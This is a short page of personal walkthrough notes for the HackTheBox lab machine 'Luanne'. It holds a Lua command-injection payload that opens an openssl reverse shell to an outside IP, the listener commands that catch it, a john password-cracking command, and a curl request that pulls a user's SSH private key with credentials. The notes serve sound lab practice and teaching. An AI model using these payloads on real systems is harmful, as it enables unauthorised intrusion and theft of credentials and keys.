xct's notes
Search…
Introduction
Red Team
Active Directory
Host Enum
Payloads
Passwords
Privilege Escalation
Evasion & Bypasses
Concepts & Research
Binary Exploitation
Web
Cloud
Mobile
Hardware
Crypto
Templates
Misc
Blue Team
Active Directory
Malware Analysis
SIEM
Misc
Labs
Keys & Signing
Language & Framwork Specifics
Misc
HackTheBox
Crossfit
Luanne
APT
Attended
Delivery
Cereal
Powered By GitBook
Luanne
Notes for https://youtu.be/TlFmnbEAi1s

User

Weather app injection

1
'+..+os.execute("mkfifo+/tmp/s%3b+/bin/sh+-i+<+/tmp/s+2>%261+|+openssl+s_client+-quiet+-connect+10.10.14.70%3a1337+>+/tmp/s%3b+rm+/tmp/s")+..+'
Copied!
Catch openssl shell:
1
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
Copied!

Crack hash from .htpasswd

1
john -w=~/tools/SecLists/Passwords/Leaked-Databases/rockyou.txt hash
Copied!

Request private key

1
curl http://webapi_user:[email protected]:3001/~r.michaels/id_rsa
Copied!

Root

Decrypt

1
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc
Copied!
HackTheBox - Previous
Crossfit
Next - HackTheBox
APT
Last modified 8mo ago
Copy link
Contents
User
Weather app injection
Crack hash from .htpasswd
Request private key
Root
Decrypt